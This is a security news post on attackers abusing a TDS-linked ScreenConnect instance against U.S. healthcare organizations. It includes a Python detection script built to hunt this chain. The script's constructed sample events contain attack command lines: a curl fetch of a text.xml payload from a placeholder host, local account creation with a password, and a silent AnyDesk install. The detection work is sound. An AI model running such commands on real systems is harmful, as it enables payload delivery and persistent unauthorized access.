Security researchers have issued a warning about hackers targeting multiple healthcare organizations in the U.S. by abusing the ScreenConnect remote access tool. The researchers traced the ScreenConnect instances involved to Transaction Data Systems (TDS), a pharmacy supply-chain and management-systems provider operating in all 50 states.

The attacks were spotted by researchers at managed security platform Huntress, who observed them on endpoints from two different healthcare organizations. They also detected activity indicating network reconnaissance in preparation for further attacks.

“The threat actor proceeded to take several steps, including installing additional remote access tools such as ScreenConnect or AnyDesk instances, to ensure persistent access to the environments” – Huntress

The intrusions were observed between October 28 and November 8, 2023, and are believed to still be ongoing.

Attack details

Huntress reports that the attacks share similar tactics, techniques, and procedures (TTPs). These include the downloading of a payload named text.xml, indicating that the same actor is responsible for all observed incidents.

The .XML file contains C# code that loads the Metasploit payload Meterpreter directly into memory, avoiding PowerShell so as to evade detection. Huntress also observed additional processes being launched through the Print Spooler service.

The compromised endpoints run Windows Server 2019 and belong to two distinct organizations – one in the pharmaceutical sector and the other in healthcare. The common link between them is a ScreenConnect instance.

The remote access tool was used to install additional payloads, execute commands, transfer files, and install AnyDesk. The hackers also tried to create new user accounts for persistent access.
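The behaviours reported above (a ScreenConnect client spawning a shell, a payload named text.xml being fetched, the Print Spooler launching unexpected children, a second remote-access tool being installed, and new local accounts being created) can be turned into simple process-creation hunts. The following is an added example, not Huntress's tooling or code from the article; the event records are constructed, Sysmon-style dictionaries, and the ScreenConnect client process name and the spoolsv.exe allow-list are assumptions to tune for your own fleet.

```python
"""Hunt for the ScreenConnect abuse chain described above over process-creation
events (constructed, Sysmon-style records). Added example, not Huntress's code;
the ScreenConnect/spooler process names and the spoolsv allow-list are assumptions."""
import re

# Constructed sample events: parent process -> child process, one record per event.
EVENTS = [
    {"host": "srv1", "parent": r"C:\Program Files (x86)\ScreenConnect Client (a1b2)\ScreenConnect.ClientService.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl -o C:\Users\Public\text.xml http://PLACEHOLDER-HOST/text.xml"},
    {"host": "srv1", "parent": r"C:\Windows\System32\spoolsv.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami /all"},
    {"host": "srv1", "parent": r"C:\Program Files (x86)\ScreenConnect Client (a1b2)\ScreenConnect.ClientService.exe",
     "image": r"C:\Windows\System32\net.exe", "cmdline": "net user svc_backup P@ssw0rd! /add"},
    {"host": "srv1", "parent": r"C:\Program Files (x86)\ScreenConnect Client (a1b2)\ScreenConnect.ClientService.exe",
     "image": r"C:\Users\Public\AnyDesk.exe", "cmdline": "AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent"},
    {"host": "srv2", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe report.txt"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SPOOLSV_CHILDREN_OK = {"printisolationhost.exe"}  # assumption: expected spooler helper, tune per fleet

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def from_screenconnect(event):
    return "screenconnect" in basename(event["parent"])

RULES = [
    # ScreenConnect client service spawning an interactive shell or script host
    ("screenconnect_shell_child", lambda e: from_screenconnect(e) and basename(e["image"]) in SHELLS),
    # The reported payload name being fetched or staged on disk
    ("text_xml_payload", lambda e: re.search(r"\btext\.xml\b", e["cmdline"], re.I) is not None),
    # Print Spooler launching anything other than its expected helper
    ("spoolsv_unexpected_child", lambda e: basename(e["parent"]) == "spoolsv.exe"
     and basename(e["image"]) not in SPOOLSV_CHILDREN_OK),
    # New local account creation, the persistence step reported above
    ("local_account_added", lambda e: re.search(r"\bnet1?(?:\.exe)?\s+user\s+\S+.*\s/add\b", e["cmdline"], re.I) is not None),
    # A second remote-access tool installed from within the first
    ("anydesk_from_screenconnect", lambda e: from_screenconnect(e) and "anydesk" in e["cmdline"].lower()),
]

def hunt(events):
    # Return (host, rule name, child image) for every rule that fires on an event.
    return [(e["host"], name, basename(e["image"])) for e in events for name, match in RULES if match(e)]

if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(hit)
```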

Researchers identified the ScreenConnect instance as being tied to the ‘rs.tdsclinical[.]com’ domain associated with TDS. It remains unclear if TDS suffered a breach, if credentials to one of their accounts were compromised, or if the attackers exploited a different mechanism.

Huntress made multiple attempts to notify TDS, now known as ‘Outcomes’ following a merger last summer, but the company did not respond.

Fabio

Full Stack Developer

About the Author

I’m passionate about web development and design in all its forms, helping small businesses build and improve their online presence. I spend a lot of time learning new techniques and actively helping other people learn web development through a variety of help groups and writing tutorials for my blog about advancements in web design and development.